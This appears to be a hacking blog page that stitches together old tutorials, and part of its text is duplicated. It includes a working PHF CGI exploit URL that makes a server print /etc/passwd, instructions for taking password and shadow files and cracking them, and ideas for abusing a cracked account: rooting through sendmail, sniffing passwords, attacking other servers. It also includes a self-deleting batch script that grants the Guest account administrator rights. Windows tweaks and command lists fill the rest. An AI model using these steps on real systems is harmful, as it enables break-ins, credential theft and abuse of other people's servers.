You could use an exploit in sendmail and get root or install a sniffer on the system and get all the passwords you could ever want from it. You could use the account to do work on OTHER servers that you sure as hell wouldn't want to do from your own. If your account is canceled you can use a hacked accounts dial up till you purchase a new one. Like I said the list goes on and on. I am sure noone wants you doing anything destuctive (its lame anyhow.) And the best thing to do is report the problem to the system admin so, if he finds out he won't freak and call your admin and tell him you have been doing naughty things or even call the cops. I hope this text was informative enough to fufill your needs
Passwd files are the easist and simplist ways to hack. This text will explain what they are, how to get them, how to crack them, what tools you will need, and what you can do with them. Of course the minute you sign on the account you just happened to crack because of this file, you are breaking the law. This text is for information, not illegal activites. If you choose to do illegal activies with the information from this it is no one's fault but your own.
What is a Passwd File
A passwd file is an encrypted file that contains the users on a servers passwords. The key word here is encrypted, passwd file should look something like this
root:x:0:1:0000-Admin(0000):/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101:4:
FTPUser:/export/home/ftp:
rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc
Out of that entire section the only name you could use would be rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rcc Heres how you read the File
rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rcc
Username: rcc
Encrypted Password: uXDg04UkZgWOQ
User number: 201
Group Number: 4
Real Name (usually): Richard Clark
Home Directory: /export/home/rrc
Type of Shell: /bin/ksh
Because it is the only name with an encrypted password.
You will never find a passwd file that has a passwd for
anything like ftp, listen, bin, etc., etc. Occasionally
using the PHF exploit or unshadowing a passwd file you can get an encrypted password for root.
PHF Exploit
First let me explain what an exploit is. An Exploit is a hole in software that allows someone to get something out of it that... Well you aren't supposed to.
The PHF exploit is a hole in CGI, that most servers have fixed now (if they have CGI). Lets just say a very popular IRC place has a problem with their CGI. Also on the subject of servers with the exploit open, many forien servers have this open. Unlike the FTP Passwd you don't even have to access their FTP or login. What you do is get a WWW browser and then in the plass for the WWW address type:
http://www.target.com/cgi-bin/phf?Qalias=j00%ffcat%20/etc/passwd
In www.target.com Place who's passwd you want to get. If you get a message like "The requested object does not exist on this server. The link you followed is either outdated, inaccurate,
or the server has been instructed not to let you have it." its not there. If you get "You have been caught on Candid Camera!" They caught you, but don't fear they rarly ever Report you. I have yet to find a server that does report. Of course if you get "root:JPfsdh1NAjIUw:0:0:Special admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7m9I:0:0:
Regular Admin login:/admin:/sbin/sh
bin:*:2:2:Admin :/bin:
sys:*:3:3:Admin :/usr/src:
adm:*:4:4:Admin :/usr/adm:/sbin/sh
daemon:*:1:1: Daemon Login for daemons needing
nobody:*:65534:65534::/:
ftp:*:39:39:FTP guest login:/var/ftp:
dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"
Save the file as a text and keep it handy, because you will need it for later in the lesson.
FTP Passwd
The Passwd file on some systems is kept on FTP, which can pretty much be accessed by anyone, unless the FTP has a non-anonymous logins rule. If you are desprite to get a passwd file from a certain server (which may not even be open, so only do if you are desprite or you want to hack your own server) get an account that allows you access to their FTP. What you do is get an FTP client such as WS FTP or CuteFTP. Find the servers name and connect to it. You should get a list of Directories like "etc, hidden, incoming, pub" goto the one called etc. inside etc should be a few files like "group, passwd" if any chance you see one called shadow there is a 8/10 chance you are about to deal with a shadowed passwd. Well get the passwd file and maybe check out what else is on the server so it won't look so suspious. Anyway when you log out, run and check out your new passwd file. If you only see names like "root, daemon, FTP, nobody, ftplogin, bin" with * beside their names where the encrypted passwd should be, you got a passwd file that you cannot crack. But if it happens to have user names (like rcc:*: or ggills:*:" with a * (or another symbol) you have a shadowed passwd. Of course if you have been reading and paying attention if you have something that has a few things that look like:
"joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"
You have gotten one you can crack .
Shadowed Passwd's
Now if you happen to find a passwd fiel that looks something like this: "joetest:*:102:100::/home/joetest:/usr/bin/restsh"
which has a user name, not a programs, you have a shadowed passwd. The shadow file has the encrypted passwords on it. Depending on the Operating System, the passwd file may be in different places. To find out what Operating system your target is running from telnet (connected to that server of course) type uname -a and it should say, if you cannot get to telnet there is other methods of finding out. Here is a guide to systems passwd file locations (taken from a text on passwd files by Kryto.) A token is the * (or other symbol) beside a shadowed passwds user name
UNIX Path Token
----------------------------------------------------------------
AIX 3 /etc/security/passwd !
or /tcb/auth/files/
A/UX 3.0s /tcb/files/auth/?/ *
BSD4.3-Reno /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files/
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow
System V Release 4.0 /etc/shadow
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *
Anyway once you have the passwd file (with user names) and shadow file you can find a unshadowing program which combines the passwd file and the shadow passwd and combines them into what a regualr passwd file would be.
A unshadowing program Download Now some servers have the shadow file on retrictions so no one without a special account on the server can get to it.
Crackers
A cracker takes the passwd file and a wordlist and compares the wordlist to the passwd files encrypted passwd. Download PaceCrack95
Download PaceCrack95
John the Ripper is the greatest, but it can be gotten off any decent hacking page. Same for Cracker Jack. A Cracker will load a wordlist and a passwd file and compare the two. When it cracks a password it will tell you the user name and the unencrypted password. You don't need to write it down because the program auto saves it. Cracker Jack saves the file as jack.pot and i think John the Ripper does too. PaceCrack95 Ver. 1.1 saves it to the files name (ex., passwd.txt.db) with the exact name and makes it a .DB file. I like to keep a passwd file once i have cracked it and later try out a new passwd cracker on it with the same wordlist and see if it works...
Wordlists
Wordlists are a nessicity to cracking passwd files. They are just huge lists of words. The biggest wordlist is avaliable from here:
ftp://ftp.ox.ac.uk/pub/wordlists/
If you get a passwd file from another contry get a wordlist with the same launguage as the worlist came from, as the users would probably use words they are familier with . There are some programs which can make random numbers to what you specify but that might not be really great, since there is such a huge amount of number combinations they could use. I am not completly saying they are useless since i have cracked a password with one before, I had fashoned my own list of 4 digit numbers since people might use their phone number and well it worked .
What to do with a Cracked Passwd file
What you can do with a passwd is up to you. The nice thing to do is inform the administator of the server that, accounts on his (or her) server are insucure and possibly open to anyone hacking an account and bringing havok upon their server. Some other things you can do is fire up good ole telnet and connect to one of their ports and see what you could do with that account. The possiblities are endless. You could hack a webpage (i wouldn't do that on account of how lame it is to destruct someones piece of work.)
You could use an exploit in sendmail and get root or install a sniffer on the system and get all the passwords you could ever want from it. You could use the account to do work on OTHER servers that you sure as hell wouldn't want to do from your own. If your account is canceled you can use a hacked accounts dial up till you purchase a new one. Like I said the list goes on and on. I am sure noone wants you doing anything destuctive (its lame anyhow.) And the best thing to do is report the problem to the system admin so, if he finds out he won't freak and call your admin and tell him you have been doing naughty things or even call the cops. I hope this text was informative enough to fufill your needs
ADMINISTRATOR IN WELCOME SCREEN
When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.
EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!
Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.
HaCk "GUEST" with Admin privileges........
open a notepad and copy text below this....@echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...
ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes
BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info
CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSVDE Import or Export Active Directory data
DATE Display or set the date
Dcomcnfg DCOM Configuration Utility
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directory
DSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory
ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EXIT Quit the CMD shell
EXPAND Uncompress files
EXTRACT Uncompress CAB files
FC Compare two files
FDISK Disk Format and partition
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR Conditionally perform a command several times
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations
GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line
HELP List of Help Commands
HFNETCHK Network Security Hotfix Checker
IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP
KILL Remove a program from memory
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer.
LOGOFF Log a user off
LOGTIME Log the date and time in a file
MAPISEND Send email from the command line
MEM Display memory usage
MD Create new folders
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files
NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights
PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory
QGREP Search file(s) for lines that match a given pattern.
RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Read, Set or Delete registry keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files.
REPLACE Replace or update one file with another
RD Delete folder(s)
RDISK Create a Recovery Disk
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)
SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
ScriptIt Control GUI applications
SET Display, set, or remove environment variables
SETLOCAL Begin localisation of environment changes in a batch file
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SOON Schedule a command to run in the near future
SORT Sort input
START Start a separate window to run a specified program or command
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration
TASKLIST List running applications and services
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file
USRSTAT List domain usernames and last login
VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label
WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WMIC WMI Commands
XCACLS Change file permissions
XCOPY Copy files and folders
DISKPART Same Like Fdisk ,Imporve Version Of Fdisk in Winxp
Sunday, March 15, 2009
A Quick Unix Command Reference Guide
Alias This allows the user to view the current aliases
awk This will allow the user to search for a pattern within a file
bdiff Compares two large files together
bfs Command used to scan a large file
cal Will show a calendar
cat Concatenates and prints a file
cc A useful c compiler
cd Used to change directories
chgrb Changes a file groups ownership
chmod Changes the permission on a file
chown Used to changes the individual ownership of a file
cmp Used to compare two files together
comm Used to find the common line in two files
cp Command to copy files to another location
cu Will call another Unix System
date Returns the date and time information
df Shows all mounted drives on your machine
diff Displays the difference between two files
du Shows the disk usage in blocks for a directory
echo Echoes the data to the screen or file
ed Simple text editor
env Lists the current environment variables
ex Just another text editor
expr Evaluates a mathmatical formula
find Name should say enough used to find a file
f77 A Fortran Complier
format Initializes a floppy disk
grep Searches for a pattern within a file
help Used for when you need help
kill Will stop a running process
ln Creates a link between two files
lpr Copies the file to the line printer
ls Lists all the files in a directory
mail This allows the user to send/receive mail
mkdir Used to make new directories
more Displays a data file to the screen
mv Command used to move or rename files
nohup Allows a command to continue running when you log out
nroff Editor used to format text
passwd Allows you to change your password
pkgadd Installs a new program onto your machine
ps Shows a listing of the current processes running
pwd Displays the name of the working directory
rm Used to remove files
rmdir Used to remove directories
set Lists all the variables in the current shell
setenv Sets the environment variables
sleep Causes a process to become inactive
source Allows the user to execute a file
sort Command used to sort files
spell Used to check for spelling errors in a file
split Divides a file in half
stty Sets the terminal options
tail Will display the end of a file
tar Copies all specified files into one
touch Creates an empty file
troff Outputs formatted output
tset Sets the terminal type
umask Specify a new creation mask
uniq Compares two files
uucp A Unix to Unix execute
vi A full screen editor
vipw Opens the vi editor as well as password file for editing
volcheck Checks to see if there is a floppy disk mounted
wc Outputs detail in the full size
who Shows other people online
write Allows you to send a message to another user
Subscribe to:
Posts (Atom)